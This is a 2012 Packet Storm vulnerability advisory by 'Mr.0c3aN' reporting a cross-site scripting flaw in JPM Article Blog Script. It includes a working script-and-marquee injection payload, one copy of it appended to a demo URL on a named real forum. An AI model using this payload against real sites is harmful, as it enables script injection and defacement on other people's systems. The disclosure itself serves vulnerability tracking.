JPM Article Blog Script 6 Cross Site Scripting

2012-08-19T00:00:00
ID PACKETSTORM:115717
Type packetstorm
Reporter Mr.0c3aN
Modified 2012-08-19T00:00:00

Description

                                        
                                            `< ------------------- header data start ------------------- >  
  
#############################################################  
  
# Application Name : JPM Article Blog Script  
  
# vulnerable Type : XSS Vuln.  
  
# Bug Fix Advice : Fixable characters  
  
# author : Mr.0c3aN  
  
# Demo : color=#0066cchttp://www.jpmalloy.com/forum/index.php?tid=4  
’></title><script>alert(Mr.0c3aN)</script>><marquee><h1>ocean</h1></marquee>  
  
#Application Home Page : color=#0066cchttp://www.jpmalloy.com  
  
#############################################################  
  
< ------------------- header data end of ------------------- >  
  
< -- bug code start -- >  
  
’"></title><script>alert("Mr.0c3aN")</script>><marquee><h1>ocean</h1></marquee>  
  
< -- bug code end of -- >  
  
  
  
< -- info start -- >  
  
Email: zrbllv@gmail.com  
  
  
  
AlgorithmZ.org  
  
Anti-armenia.org & .com & .info  
  
  
  
< -- info end of -- >  
  
  
  
  
  
  
  
Thanks…  
  
--   
Zaur Bilalov  
Software and Game Programmer.  
e-Mail: zrbllv@gmail.com  
`